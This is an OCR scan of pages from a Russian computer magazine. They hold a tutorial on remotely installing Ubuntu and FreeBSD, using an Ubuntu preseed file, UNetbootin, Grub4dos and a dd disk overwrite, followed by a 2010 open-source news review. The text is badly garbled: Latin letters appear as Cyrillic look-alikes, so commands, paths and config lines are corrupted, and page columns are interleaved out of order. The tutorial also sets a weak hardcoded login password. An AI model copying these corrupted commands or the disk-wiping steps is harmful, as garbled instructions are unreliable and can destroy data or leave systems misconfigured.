шив размер ЫТРЗ-раздела с помощью Рагббоп Мадіс в ѴѴіпХР/ѴѴіп2кЗ 
или оснастки сІізкппдтТтзс в Ѵізіа/Зеѵеп. После этого запускаем 
ѴИиаІВох и создаем новую виртуальную машину, указав подготовлен- 
ный ранее образ в качестве первого жесткого диска. Далее открываем 
свойства виртуальной машины, вкладку «Носители», и указываем в 
качестве Сй-ПОМ реальный привод компа. Запускаем ВМ и благопо- 
лучноустанавливаем Ыпих в свободную область диска. 

Предупрежу, что сразу перезагружать реальную машину не стоит, 
иначе мы потеряем к ней сетевой доступ (сеть будет л ибо вообще 
не настроена, либо настроена на подключение к виртуальной сети 
ѴИиаІВох). Сначала необходимо загрузить дистрибутив в виртуаль- 
ной машине и настроить сеть та к, чтобы она была работоспособна 
после загрузки ОС на реальном железе (то есть скопировать сетевые 
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И записать следующие строки в тепиізі 



#ѵі/ЬооІ/дгиЬ/тепи.І5І 

РіРІе ШшпЬи 10.10 АиРоІпзРаІІ 

# Заменяем X, У, 2 на номер диска, раздела и букву 
слайса, далее пишем полный путь до 130-образа на 
этом слайсе 

тар (ЬбХ , У , 2 ) /иЬипРи-10 . 10-зегѵег-іЗ 86-аиРо .ізо 
(М3 2 ) 
тар --Ьоок 
сЬаіпІоабег (Ьб32) 



После этого можно перезагружаться. 



настройки из работающей в данный моментОС). Делать это нужно 
с предельной осторожностью, потому как одна ошибка навсегда 
отрежет машину от интернета. Большим плюсом будет работающий в 
локальной сети ОНСР-сервер, раздающий настройки для подклю- 
чения к интернету, в этом случае ничего настраивать не придется и 
достаточно будетустановить 55Н-сервер и завести пользователя, 
с правами которого мы сможем попасть на машину (впрочем, пос- 
ледние две вещи придется сделать в любом случае). Когда все это 
будет выполнено, машину можно перезагрузить и минут через пять 
попытаться подключиться к ней по 55Н. 

От ѴѴіпсІоѵѵз к Ипих. ІІЫеіЬооііп 



Выбираем дефолтовый вариант загрузки 



не будет полностью установлена (не сможем отвечать на вопросы 
инсталлятора). Все это приведет ктому, что после перезагрузки 
машина окажется застопоренной на первом же вопросе. 

Чтобы побороть проблему, нам придется создать собственный 
установочный 150-образ ІІЬипІи, который сможет произвести 
инсталляцию ОС в полностью автоматическом режиме. Для этого 
нам потребуется образ серверной версии ІІЬипІи-1 0.1 0 (десктоп- 
ный вариант не поддерживает автоматизацию установки), немного 
смекалки и файл дефолтовых ответов на вопросы инсталлятора (так 
называемый ргезеесі-файл). Инструкция: 

1. Скачиваем установочный образ ІІЬипІи 10. 1 0 и распаковываем 
его в отдельный каталог: 

$ зибо тоипР -о Іоор \ 

иЬипРи-10 . 10-зегѵег-і386 . ізо /сбгот 
$ ткбіг ту с б 
$ гзупс -а /сбгот/ тусб 

2 . Добавляем в образ ргезеесі-файл (пример можно взять на прила- 
гаемом к журналу диске): 

$ ѵіаиіо.зеесі 

# Говорим по-русски 

б-і беЬіап-іпзРаІІег/ІосаІе збгіпд ги_КЬ 



ІІІЧеіЬооІіп (ІІпіѵегзаІ N еібооі; ІпзІаІАег) — это графическая програм- 
ма, предназначенная для создания загружаемых ІІ5В-носителей 
с ІІІМІХ-подобными ОС на борту или же установки II N IX на жест- 
кий диск без использования физических носителей. Она может 
работать как в ѴѴіпсІоѵѵз, так и в Ыпих, поддерживает несколько 
десятков различных ОС (дистрибутивы Ыпих и ОС семейства В5й) и 
невероятно проста в использовании. Далее мы рассмотрим, как с ее 
помощью установить ІІЬипІи. 

Для начала необходимо получить саму утилиту. Заходим на 
страницу ипеіЬооІіп.зіпеІ и нажимаем большую синюю кнопку с 
надписью «Ооѵѵпіоасі» Мо г ѴѴіпсІоѵѵз» или «Ьг Ыпих»), Запускаем 
полученный файл (в случае с Ыпих-версией его сначала необхо- 
димо сделать исполняемым). Появится окно ІІІМеіЬооІіп, в котором 
можно выбрать дистрибутив, его версию, тип установки ( N еіі пзіа II 
для сетевой установки или НсІМесІіа для установки с заранее под- 
готовленного образа), в самом нижнем поле можно выбрать тип 
установки, в нашем случае — «Жесткий диск», нажать кнопку ОК и 
перезагрузить комп. 

В обычной ситуации всего этого достаточно для того, чтобы 
ІІІЧеіЬооІіп смог установить на диск загрузчик и минимальный 
Ыпих- образ, который скачает установочные файлы ОС на диск и 
запустит инсталлятор. Однако мы имеем дело судаленной машиной 
и поэтому не сможем получить доступ кОС до того момента, пока она 



# Английскую раскладку, пожалуйста 

# Можно сразу указать ги, чтобы потом не мучиться 
б-і сопзо1е-зеРир/азк_беРесР Ьооіеап іаізе 

б-і сопзоіе-зекир/ ІауоиРсобе зкгіпд из 

# Пусть сам выберет дефолтовый сетевой интерфейс 
б-і пексід/с1юозе_іпРегіасе зеіеск аико 

# Качаем пакеты по РТР 

б-і тіггог/ргобосоі збгіпд ірр 

# Ставим в самую большую неразмеченную область диска 
б-і рагРтап-аиРо/іпіР_аиРотаРіса11у_рагРіРіоп зеіесб 
ЬіддезР_ігее 

# Все файлы в один раздел 

б-і рагРтап-аиРо/с1юозе_гесіре зеіесб аботіс 

# Ставим на ЕхР4 

б-і рагРтап/беіаиІР_іі1езузРет збгіпд ехР4 

# Соглашаемся со всем, что говорит программа разметки 
б-і рагРтап-рагРіРіопіпд/сопіігт_^гіРе_пе^_1аЬе1 
Ьооіеап Ргие 

б-і рагРтап/сЬоозе_рагРіРіоп зеіесб ііпізЬ. 

б-і рагРтап/сопіігт Ьооіеап Ргие 

б-і рагРтап/сопіігітщпооѵегшгіРе Ьооіеап Ргие 

# В системе один пользователь — изег (пароль гези) 
б-і раззмб/изег-іиііпате збгіпд ГПэипРи бзег 
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ІІІЧІХОЮ 







ООврилжкл ІИиІади 0 \~ 

Тмп; УсІрсйітайЦЫі НвСнгт; «1 I 




ІІЫеіЬоогіп собственной персоной 



б-і раззмб/изегпате збгіпд изег 

б-і раззмб/изег-раззмогб-сгурбеб раззѵгогб 458с9ЬбеЗЬ6 
716аб97 6383сб20а3бсб4 

б-і изег-зебир/аНотлг-раззчлгагб-меак Ьооіеап бгие 

# Ставим десктопную редакцию дистрибутива 

# Можно заменить на киЬипби-безкбор или иЬипби-зегѵег , 
например 

базкзеі базкзеі/ бігзб тиібізеіесб иЬипби-безкбор 

# Ставим ЗЗН-сервер 

сі-і ркдзеі/іпсіибе збгіпд орепззЬ-зегѵег 

# Разрешаем загрузчику найти другие установленные ОС и 
добавить их в меню 



# ІР-адрес 

сі-і пебсбд/деб_іраббгезз збгіпд 192.168.0.1 

# Маска сети 

б-і пебсбд/деб_пебтазк збгіпд 255.255.255.0 

# Адрес шлюза 

б-і пебсбд/деб_дабемау збгіпд 192.168.0.2 

# Подтверждение конфигурации 

б-і пебсбд/сопбігт_збабіс Ьооіеап бгие 

3. Редактируем кон фи г за грузчика так, чтобы он узнал о существо- 
вании нашего ргезеесі-файла: 

$ зеб -е 1 з#бі1е=/сбгот/ргезееб/иЬипби . 
зееб#аибо=бгие\ ргіогібу=сгібіса1\ бі1е=/сбгот/ 
ргезееб/аибо . зееб# 1 тусб/ізоііпих/бхб . сбд > бхб.сбд 
$ зибо тѵ бхб.сбд тусб/ізоііпих/ 

4 . Удаляем старый файл контрольных сумм и создаем новый: 

$ сб гпусб 

$ зибо гш тб5зшп.бхб 

$ біпб -буре б -ргіпбО I зибо хагдз -0 тб5зит | \ 
дгер -ѵ Ізоііпих/Ьооб . саб I зибо бее тб5зит.бхб 

5 . Генерируем новый 150-образ: 

$ зибо ткізобз -Б -г -V "БЬипби 10.10 Аибоіпзбаіі " \ 
-сасЬе-іпобез -б -1 -Ь ізоііпих/ізоііпих . Ьіп \ 

-с Ізоііпих/Ьооб . саб -по-ешиІ-Ьооб \ 
-Ьооб-Іоаб-зізе 4 -Ьооб-іпбо-баЫе \ 

-о . . /иЬипби-10 . 10-зегѵег-іЗ 86-аибо . ізо . 




б-і дгиЬ-іпзба11ег/тлібЬ_обЬег_оз Ьооіеап бгие 

# Автодетект монитора (БЬипби, как-никак) 
хзегѵег-хогд хзегѵег-хогд/аибобебесб_топібог Ьооіеап 
бгие 

$ зибо ср аибо . зееб тусб/ргезееб 

В файле прописаны ответы на вопросы инсталлятора, по умолча- 
нию будет выбран русский язык и раскладка из, в качестве места 
дислокации новой ОС на диске будет выбрана максимальная 
неразмеченная область, дополнительно будетустановлен пакет 
орепззб-зегѵег и добавлен пользователь изег с паролем гези, 
так что после загрузки на машину можно будет войти по 55Н. 
Если для подключения машины к сети используется ручная на- 
стройка (а не ОНСР), то строку «б-і пебсбд/сЬоозе_іпбегбасе 
зеіесб аибо» следует заменить на пять следующих строк, под- 
ставив реальные адреса: 

# ББЗ-сервер 

б-і пебсбд/деб_патезегѵегз збгіпд 8. 8. 8. 8 



Установка СшЬ4сІо$ в Ѵі$*а/5еѵеп 



1. В кореньдиска С: помещаем файлы дгібг, дгШг.тбги тепиЧзр 

2 . Добавляем запись в загрузчикѴѴіпбоѵѵз: 

> Ьсбебіб /сгеабе /б "СгиЬ4Боз" /арріісабіоп 
Ьообзесбог 

3. Редактируем запись (Ю берем из вывода предыдущей команды]: 

> Ьсбебіб /зеб ІБ беѵісе рагбібіоп=С: 

> Ьсбебіб /зеб ІБ рабЬ ХдгІбг.тЬг 

> Ьсбебіб /бізріауогбег ІБ /аббіазб 



Закачиваем получившийся 150-образ на удаленную машину, 
запускаем 16 N еі Ьооі; і п , выбираем пункт «Образ диска», далее 
— «150-образ», находим образ на диске и нажимаем кнопку О К. 
После завершения работы ІІЫеіЬооІіп заходим в свойства «Моего 
компьютера», открываем вкладку «Дополнительно», нажимаем 
кнопку «Параметры» в разделе «Загрузка и восстановление» и 
выбираем «ІІМеіЬооІіп» в поле «Операционная система, загру- 
жаемая по умолчанию». Это позволит машине автоматически 
загрузить 150 -об раз, установленный с помощью ІІЫеіЬооІіп. 
Перезагружаем машину. Через 30 минут пробуем подключиться 
к серверу, молясь всем богам автоматизации. Примерно также 
можно установить ОеЬіап.нос другими дистрибутивами все будет 
иначе. Многие из них вообще не поддерживают автоматизацию 
процесса установки, другие используют совсем другой ее вариант 
(например, Кіскзіа гі в ПесІНаІ:). 

От ѴѴіпсІоѵѵз к Ыпих. 6гиЬ4сІоз 

Людей с пытливым умом наверняка интересует механизм работы 
Ь N еіЬооІі п . В этом разделе речь пойдетотом, как вручную сделать 
то же, о чем мы говорили выше. В качестве основного инструмента 
будет выступать 0гиЬ4сІО5 — вариант ОгиЬ, способный грузиться с 
РАТ32 и І\ІТР5-разделов, всетотже переработанный образ ІІЬипІи и 
гвоздь программы — ѴѴіпХР. 

Главная задача — установить 0гиЬ4сІО5 на системный диск 
ѴѴіпсІоѵѵз и сделать та к, чтобы мы смогли получить к нему доступ. 
Для этого идем по ссылке зоигсе^огде.пе1:/рго]ес1:5/дгиЬ4с1о5/ 
Ыез/ . скачиваем последнюю версию 0гиЬ4сІО5 и распаковываем 
файлы дгШг и тепи.ізі в корень диска С:. Далее снимаем с фай- 
ла с:/ЬооРіпі атрибут «Только для чтения» и добавляем в конец 
секции [Ьооі Іоабег] следующую строку: 

бебаи1б=с : \дг1б 

И эту строку последней: 



► 092 



ХАКЕР 01 [144) 201 1 







Так выглядит загрузочное меню ІЛ/іпХР после 
того, как над ним поработал ЫеіЬооІіп 



с : \дг1с!г= " СгиЬ4Боз " 

Сохраняем файл. Открываем сУппепи.ІзІ и пишем в 
него следующее: 

кікіе Шэипки 10.10 Аикоіпзкаіі 

кіпсі --зек-гоок /иЪипки-10 . 10-зегѵег- 
ІЗ 86-аико . ізо 

тар /иЪипки-10 . 10-зегѵег-іЗ 86-аико .ізо 
( ІгсЗ.3 2 ) 

тар --кюок 
сЬаіпІоасіег (Ьс332) 

Сохраняем. Помещаем 150-образ в кореньдиска С: р 
перезагружаем ОСь, ждем 30 минут, подключаемся по 
55Н с именем пользователя «изег» и паролем «гези». 

От Ыпих к РгееВЗй. Путь 
джедая 

Последний из вариантов удаленной установки ОС не 
так тривиален, как предыдущие. Мы будем устанав- 
ливать РгееВЗО на машину, работающую под управ- 
лением Ыпих, причем сделаем это так, что свежеуста- 
новленная ОС полностью затрет существующую. Для 
тех, кого интересует, зачем это нужно, отвечу: многие 
хости нги сдают в аренду серверы только под управ- 
лением Ыпих, не предоставляя доступа кудаленной 
консоли и таким образом лишая пользователей выбо- 
ра. Описанная в статье методика позволит поставить 
на сервер РгееВЗБ, имея доступ только по 55 РІ . 
Проделать это можно с помощью инструмента под 
названием іт^зВЗО [ т^зЬзсІ.ѵх.гк ]. который позволяет 
создать минимальный дисковый образ РгееВЗО, пол- 
ностью загружаемый в память. Записав этот образ в 
начало жесткого диска и перезагрузив машину, мы по- 
лучим сетевой доступ к полностью рабочей минималь- 
ной копии РгееВЗй, которую сможем использовать для 
последующей установки полноценной ОС с помощью 
стандартного инсталлятора зузіпзіаи. Порядокдейс- 
твий следующий: 

1. Скачиваем архив пл^зВЗО на локальную машину и 
распаковываем его: 

$ мдек тізЬзсІ. ѵх . зк/геІеазе/тізЬзсІ-1 . 0 . Саг . дг 
$ каг Х 2 І тізЬзсі-1 . 0 . каг . дг 
$ ссі ткзЪзсІ-1 . 0 



2 . Создаем конфигурационный файл гс.сопр который 
будет использоваться в образе: 

$ ср сопк/гс . сопк . затріе сопк/гс.сопк 

Добавляем в конец файла следующие строки: 

$ѵісоггі/гс.соггі 

# ІР-адрес маршрутизатора 
с!екаи1кгоикег= "192.168.0.1" 

# Настройки сетевого интерфейса 
іксопкід_геО= " іпек 192.168.0.2 пектазк 
255.255.255.0" 

Здесь геО используется в качестве примера. В 
реальной ситуации ты должен узнать, какая сетевая 
карта установлена на машине (сіппезд в помощь), и 
подобрать к ней соответствующее имя сетевого интер- 
фейса (которое по совместительству является именем 
драйвера, например, геО — это сетевая карта РеаГГек 
81 39 С, драйвер для которой носит имя «ге»). Также 
следует отметить, что если машина получает сетевые 
настройки по ОНСР, то последняя строка должна 
иметь следующий вид: 

іксопкід_ге0= " БНСР " 

3. Создаем мини-образ изустановочного 150-образа 
РгееВ50 (можно скачать с (ІрѴЛірТгееЬзсІ.огд . либо бли- 
жайшего зеркала): 

$ зисіо тоипк -о Іоор \ 




> ѵѵагпіпд 

Настоятельно 
рекомендую 
тестировать все 
описанные 
в статье методы на 
виртуальной машине 
перед применением 
на машине реальной. 




> іпіо 

• В Ыпих вместо 
Ѵі гіиа ІВох 
гораздо удобнее 
использовать дети: 



ЕгееВЗБ-8 . 1-КЕЬЕАЗЕ-і386-сіізс1 . ізо /ссігот 

4 . Перекидываем полученный образ на удаленную 
машину: 



• $ зисіо цети -Ма 
/сіеѵ/зсіа -ссігот 
ибипЩ-1 0.1 0-сІезк- 
іор- І386. ізо - Ьооі сі 



$ зср сіізк. ітд гоок@192 .168.0.1: . 



5 . Заходим на удаленную машину с правами гооі’а, запи- 
сываем образ на диски идем на перезагрузку: 



# сМ ік = /гоок/сіізк. ітд ок = /<іеѵ/з(іа Ьз=1т 

# геЬоок 



Через пять минут вновь подключаемся кудаленной 
машине в качестве гооСа, вводим пароль т^згооі;, 
запускаем зузіпзІаЦ и приступаем к обычной установке 
РгееВЗО. В качестве источника установки выбираем 
РТР или НТТР. 

Преимущество способа в том, что существующую ОС 
можно спокойно затереть во время установки новой 
(хотя это все равно придется сделать, так как мы за- 
терли таблицу разделов), ни один из описанных выше 
способов не позволяет проделать такое. 

Заключение 

Как видишь, такая, казалось бы, нетривиальная 
задача, как удаленная установка ОС, на самом деле до- 
статочно проста и может быть выполнена множеством 
разных способов, начиная с использования виртуаль- 
ной машины и заканчивая созданием загружаемых в 
память дисковых образов. Более того, автор совсем 
не удивится, узнав, что кто-то придумал еще десяток 
других способов, т 
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Предсказание 

оракула 

Слухи отом, что корпорация Бип Місгозузіетз, 
возможно, будет кому-то продана, начали 
ходить еще в конце 2008. Весной 2009 выясни- 
лось, что покупателем станет Огасіе, а сумма 
сделки превысит7 миллиардов долларов. Но 
завершилась сделка только в 201 0 — антимо- 
нопольные органы Евросоюза долго недавали 
добро. Таким образом, в руках Огасіе оказа- 
лась судьба большого количества продуктов (в 
том числе и ОрепБоигсе) итехнологий, ранее 
принадлежавших Бип. 

Судя по всему, Заѵа — одна из основных при- 
чин сделки, поскольку именно этой технологии 
Огасіе обещал уделять больше всего внима- 
ния. Весь год не переставали выходить стан- 
дартные Ьидбх и зесигКу-релизы ^Кб. Однако 
на этом Огасіе не останавливается и планирует 
выпустить ^К7 иХК8 в 201 1 и 201 2 году 
соответственно. Основные изменения будут 
направлены наувеличение производитель- 
ности ѴМ и реализацию поддержки новых 
версий стандартов, в частности, ипісосІе,ХМІ_ 
и^ВС. 

ОрепБоІагіз повезло нетак, как Заѵа: Огасіе 
прекратила его поддержку. Вместо него будет 
предложен бесплатный, но закрытый Воіагіз 
Ехргезз. Однако это не означает, что компания 
прекратит открывать исходные коды; они будут 



публиковаться (какподлицензией СВОЕ, так 
и под ѲРЦ но с заметной задержкой после 
выхода закрытой версии. Не все пользовате- 
ли ОрепБоІагіз обрадовалисьтакому исходу 
событий. Некоторые даже собралисьтолпой 
и сделали форк, назвав его ІИитоз. Правда, 
пока ни одного стабильного релиза выпущено 
не было. Да и нестабильного тоже — все на 
уровне обсуждений. 

Вместе с Бип Огасіе приобрел себе еще и 
одну из самых распространенных СУБД — 
Му5СН_. Так каку Огасіе уже есть своя СУБД, 
были опасения, что вторую он развивать 
не станет. «Отец» Му50І_, Майкл «Монти» 
Видениус, даже сделал форк на всякий случай 

— МагіаОВ. Однако, опасения оказались 
напрасными — Огасіе обещал поддерживать 
Му5СН_ и даже увеличить инвестиции в проект 
(посравнениюсБип). 

Еще один очень важный и известный в 
0реп5оигсе-мире проект, доставшийся Огасіе 

— ОрепОШсе. В начале 2010 вышла версия 3.2 
со следующими основными изменениями: 

• Ускорение запуска. Вообще, разработчики 

— молодцы, занялись, наконец, проблемами с 
производительностью — вотуже пару версий 
каждая следующая быстрее предыдущей; 

• Улучшена поддержка форматов М$ Ойісе, в 
частности, реализована возможность работы с 
документами, защищенными паролем; 



• Поддержка шрифтов ОрепТуре, наследни- 
ка ТшеТуре; 

• В Саіс улучшены автозаполнение, сортиров- 
ка и слияниеячеек. 

Бип развивал много ОрепБоигсе-проек- 
тов. Один из них — система виртуализации 
ѴігІиаІВох. После смены спонсора обновле- 
ния выходят также стабильно, но разработка 
стала более закрытой, из свободного доступа 
исчезли бета-версии. Каки прежде, есть две 
версии — открытая и закрытая (бесплатна 
для использования в некоммерческих целях), 
отличающаяся, в основном, поддержкой 115В 
и наличием НОР-сервера, позволяющего под- 
ключаться к виртуальной системе с помощью 
любого РОР-клиента. 

Следующий достаточно известный откры- 
тый проект, спонсируемый Бип — ЫеіЬеапз. 
Огасіе обещал поддерживать и его. И, судя по 
графику выхода новых версий, слово свое пока 
держит. В июне вышла версия 6.9 с обширным 
списком изменений (поддержка РоРЗ, ЗаѵаЕХ 
5йК 1 .3, возможностью генерации инсталля- 
торов и многим другим), а в марте 201 1 должна 
выйти версия 7.0. 

Упих 

Продажа Бип никакие повлияла на разработ- 
ку ядра, и за прошедший год Ыпих пережил 
четыре новых релиза: 2.6.33-2.6.36. Количес- 
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Группировка табов в РігеРох 4 




> Іі п к 5 

• іЦитоз.огд — форк 
ОрепЭоІагіз 

• ѵѵѵѵѵѵ.сіоситепі:- 
Фипсіаііоп.огд — ТЬе 
Ооситепі; Еоипсіаііоп 

• теедо.сот - 
официальный сайт 
Меедо 




> іпіо 

• Более подробно 
про сделку Огасіе 
и 5ип можно 
прочитать в ][ № 131 . 

• Полную версию 
этой статьи 

ты найдешь на 
прилагаемом 
к журналу диске. 



тво изменений огромно и плохо соотносится 
с размером статьи, поэтому перечислю лишь 
основные: 

• Драйвер ІМоиѵеаи включен в ядро. ІМоиѵеаи 
— драйвер, разрабатываемый сообществом 
без поддержки ІМѵібіа с помощью реверс-ин- 
жиниринга. От открытого драйвера пѵ отлича- 
ется, в основном, поддержкой Зй-ускорения; 

• В ядро включен БРЕЮ (ОізІгіЬиІеб Періісаіесі 
ВІоскОеѵісе) — грубо говоря, это РАЮ-1 посети; 

• Новые файловые системы — Серб (распре- 
деленная) и І_одР5 (для флешеки 550); 

• Про «старые» ФС тоже незабыли. Например, 
в ЫіТз была добавлена функция Оігесі 1/0, 
позволяющая отключить кэш ФС. Это бывает 
полезно при использовании приложений, 
имеющихсобственный кэш, например, СУБД. 
В ХР5 добавлен режим журналирования, 

при котором несколько транзакций накапли- 
ваются в памяти, прежде чем записаться в 
лог. Использование этой функции позволяет 
существенно поднять производительность 
при интенсивной работе с метаданными. В 
СІР5 реализована поддержка локального 
кэширования данных. В БдиазЫь появилась 
поддержка алгоритма сжатия І_20; 

• Асинхронное засыпание/пробуждение — те- 
перь этот процесс будет происходить гораздо 
быстрее за счетпараллелизации перевода в 
спящий режим РСІ, 115В и 5051-драйверов; 



• Поддержка переключения видеокарт. На не- 
которыхлаптопахестьдве видеокарты: встро- 
енная (маломощная и энергоэффективная) и 
дискретная (мощная и жадная до батарейки). 
Теперь между ними можно переключаться на 
лету, правда, требуется перезапуск иксов; 

• В йРМ-модуль (Оігесі Репбегіпд Мападег, не 
путать с Оідііаі РідЫз Мападетепі) для видео- 
карт Іпіеі добавлена возможность аппаратной 
акселерации декодирования Н.264 и ѴС1 для 
чипов 045+; 

• Поддержка протокола І_2ТР версия 3 (РРС 
3931); 

• Новый интерфейсдля конфигурирования 
параметров сборки ядра: «плаке псопТід». По 
сути, это обновленный теписопбд, который 
теперь выглядитболее современно; 

• Технология мандатного контроля доступа 
АррАгтогтеперь включена в ядро. Основное 
отличие АррАгтоготуже давно входящей в 
ядро похожей технологии 5ЕІ_іпих втом, что 
АррАгтог определяет полномочия, исходя из 
файлового пути объекта. АБЕЫпихисполь- 
зуетспециальные метки. Поэтому настройка 
АррАгтог проще, но ВЕЫпих считается более 
безопасной; 

• Добавлена поддержка процессорной ар- 
хитектуры Тііе, отличительной особенностью 
которой является размещение на одном чипе 
до нескольких сотен ядер; 



• 00М Кіііег (Ой! оі 1 Метогу КіІАег), отвеча- 
ющий за принудительное завершение процес- 
сов при нехватке памяти, теперьстал умнее. 

Он уже не завершает процесс-родитель, пока 
у него есть потомки, и умеет распознавать и 
блокировать простейшие Фгк-бомбы. 

Про версию 2.6.37, которая выйдет в 201 1 , 
известно пока не очень много: ІМоиѵеаи йЕМ 
будет поддерживать управление питанием, 
Еабеоп йЕМ получитфиксы для карт Еабеоп 
ЕЮ 5000 и младше, но, ксожалению, под- 
держки ЕЮ 6000 пока ждать не приходится. 
Іпіеі йЕМ получит поддержку ОізрІауРогІ-ау- 
дио. Ксожалению, VI А БЕМ в 2.6.37 не будет, 
несмотря на обещания компании его выпус- 
тить. Можно сказать еще, что пока точно не 
будет поддержки ФС Ееізег4 в ванильном 
ядре; она могла в него войти, но, видимо, не 
сошлось. 

Ближе к пользователю 

ЕНе стоят на месте и более приближенные к 
конечному пользователю продукты. ЕНапри- 
мер, окружения рабочего стола. Оба главных 
конкурирующих БЕ в 201 0 году представили по 
два релиза. Только сітапдеіод в случае с Споте 
гораздо более скромный, разработчики готовят- 
ся крелизуЗ.О (по идее, выпускзапланирован 
на6апреля201 1). Итак, главные изменения в 
версиях2.30 и 2.32: 
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Двухпанельный наутилус 




Меедо в редакции для нетбуков 

• Ыаиіііизтеперь можетбыть двухпанельным. Также теперь при конф- 
ликтах во время копирования/перемещения появляется диалоговое 
окно для их разрешения; 

•Удален апплет 6ІЧ0МЕ КеуЬоагсІ Іпсіісаіог, теперь при выборе несколь- 
ких раскладок клавиатуры индикатор автоматически появляется в 
области уведомлений; 

• Интерфейсуправления пользователями в дпоте-зузіет-іооіз стал 
более удобным: возможность удалить папку пользователя приудале- 
нииучетнойзаписи, поддержка шифрования домашней папки при 
создании пользователя; 

• ОЫОМЕТегтіпаІ: неограниченная прокрутка, сохранение позиции 
прокрутки; 

• Вгазегои ЕіІеРоІІегтеперь могутустанавливать необходимые пакеты 
через РаскадеКіІ; 

• Клиентобмена сообщениями Етраібу получил поддержку защищен- 
ных паролем комнат и мета -конта кто в, а также возможность пересылки 
файлов простым перетаскиванием; 

• Веб-браузер Ерірбапу научился запоминать пароли черездпоте- 
кеугіпд ; 

• В ЮЕАщиІа появилась полная поддержка Руібоп и Ѵаіа. 

СЬапдеІод КОЕ за 2010 год гораздо более интересен: 

• Новая оболочка Ріазппа ЫеіЬоок для устройств с небольшой диагона- 
лью экрана; 

• В Кѵѵіп появился встроенныйтайлинг(режим, при котором окна не 
перекрывают друг друга); 



• Переработана область уведомлений; 

• Произвольные окна могутбытьсгруппированы в виде вкладок; 

• Значительно изменен внешний вид обозревателя виджетов; 

• Виджеты Ріазппа теперь можно добавить в системный трей; 

• Новый интерфейсуправления сетью в КЫеІѵѵогкМападег; 

• В ОоІрЫп появился встроенный ПОИСК; 

• В Ктаіідобавлены функции архивирования электронных писем и 
поиска потегам. 

Крометого, наконец-то вышла кЗЬ 2.0 с поддержкой КРЕ4 и другими 
изменениями вроде поддержки записи на Віи-гау. 

Про КйЕ 4.6 (релиз должен состояться в январе 2011) известно уже 
практически все: 

• Оптимизация производительности Кѵѵіп ; 

• У Ыеротик появятся функции бэкапа и синхронизации; 

• Оптимизация Ріазппа для использования стачскринами; 

• Роѵѵе пй еѵі I ѵ2 ; 

• КЗпарзбоІ получит возможность выделить произвольный участок 
экрана (а нетолько прямоугольный). 

Браузерные войны 

Пожалуй, самое часто используемое приложение в современной ОС 
— это браузер. Асамый популярный ОрепЗоигсе-браузер — Рігебох. По 
данным пеітагкеізбаге.сот, по состоянию на октябрь 201 0 он занимал 
почти 23% рынка браузеров. В начале 2010 года вышла мажорная вер- 
сия 3.6, а в начале 201 1 выйдет Рігебох 4. 

Главные изменения РР 3.6: 

• Проходиттест АсібЗ на 94 балла из 1 00; 

• На 1 5% быстрее версии 3.5; 

• Добавлен формат шрифтов ѴѴОЕЕ. Целочисленное переполнение при 
обработке этих шрифтов стало причиной выпуска версии 3.6.2; 

• Добавлена возможность быстрого и простого изменения внешнего 
вида браузера с помощью механизма Регзопаз; 

• НТМЕ5-видео можетбыть развернуто на полный экран. 

В процессе работы над РР 3.6 в МоДИа приняли решение изменить 
подход к разработке. Если раньше минорные версии включали в себя 
только обновления безопасности, а новый функционал добавлялся 
только в мажорных версиях, то теперь новый функционал будет до- 
бавляться в минорные версии вместе с обновлениями безопасности. 
Первое изтаких обновлений (3.6.4) вместе с закрытием уязвимости 
принесло механизм, с помощью которого некоторые плагины работают 
в изолированных процессах. Теперь браузер будет продолжать рабо- 
тать при крахе этих плагинов. 
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Так выглядит РІазта ЫеіЬоок 




Новый интерфейс конфигурирования ядра 



С компанией МоДИа в 2010 году была связана одна неприятная 
история: в каталоге расширений были найдены два дополнения с тро- 
янами: ЭоіЫпкѴѴеЬѴісІео Ооѵѵпіоасіег версии 4.0 и все версии Мазіег 
Рііег. Несмотря нато, что дополнения находилисьв разделе «экспери- 
ментальных» (при ихустановке выдавалось дополнительное предуп- 
реждение о возможности заражения), отзаражения могли пострадать 
около 4600 пользователей ѴѴіпсІоѵѵз (на других платформахтроян не 
работал). МоДИа признала свою вину и обещала принять меры, чтобы 
ситуация больше не повторилась. 

Основные новшества Рігей>х4: 

• Какобычно, обещают космическое ускорение; 

• Панельвкладокперенесена в верхнюю частьокна (какв Ооодіе 
СЬготе). 

• Поддержка медиа-контейнера ѴѴеЬМ и видеокодека ѴР8; 

• Встроенная функция синхронизации закладок, сохраненных 
паролей, истории и настроек. Раньше для этого приходилось ставить 
дополнение МоДИа 5упс; 

• Финальная версия будет доступна и в 64-битных сборках под І_іпих, 
МасОЭХи ѴѴіпсіоѵѵб; 

• Технология дополнений .МРаск, написанных на НТМІ_, С55 и 
Заѵазсгірі. Для их написания не надо изучать XI) Ц а для установки не 
надо перезапускать браузер; 

• Поддержка стандарта ѴѴеЬО І_, предназначенного для отображения 
30-графики в браузерах. Стандартеще находится в стадии черновика; 



• Аппаратная 20-акселерация вывода графики (правда, пока только 
для ѴізІа/5еѵеп. Для Ыпихи Мае 05 X ожидается в следующих версиях); 

• Добавлен новый блок«АррТаЬ», который служит для автоматической 
загрузки часто просматриваемых сайтов при старте браузера. Чтобы 
поместить вкладку в эту область, надо в контекстном меню вкладки 
выбрать«Ріп аз АррТаЬ»; 

• Возможность группировать вкладки и легко переключаться между 
группами. 

Кроме Рігебох есть еще один опенсорсный браузер, догоняющий его по 
фичам, но пока не по популярности — Ооодіе СЬготе/СЬготіит. В мае 
2010 вышла первая стабильная версия Ооодіе СЬготе под І_іпих (под 
номером 5) со следующими нововведениями: 

• Возросшая производительность, в основном за счетувеличения 
скорости выполнения ЗаѵаЭсгірІ; 

• Поддержка синхронизации не только за кладок, но и настроек брау- 
зера; 

• Поддержка та кихтехнологий НТМІ_5, какѴѴеЬЭоскеІз, Огад-апсІ-сІгор, 
ѲеоІосаІіопАРІ и Арр Сасбе. 

В июле 2010 разработчики СЬготе перешли на новый цикл релизов: 
теперь они стараются выпускать стабильную версию каждые шесть 
недель (в полном соответствии с лозунгом «Реіеазе Еагіу, Реіеазе 
ОНеп»), Поэтому версия 6 вышла уже в сентябре, но не включала в себя 
каких-нибудь серьезных изменений: 

• Поддержка установки веб-приложений из СЬготе ѴѴеЬ 5іоге. Это 
новый магазин веб-приложений отбоодіе. Довольно актуальный в 
свете надвигающегося релиза СЬготе 05. Интересно, что «налог» на 
продажу своих приложений из этого магазина составляет всего 5% 
(сравни с30% для Арр5іоге); 

• Эта версия примерно на 1 5% быстрее предыдущей; 

• Новая система автозаполнения форм АиІо-ТИ. Теперь браузер 
запоминаетзначение нетолько отдельных полей ввода, но и форму 
целиком; 

• Теперь синхронизируется и база автозаполнения полей. 

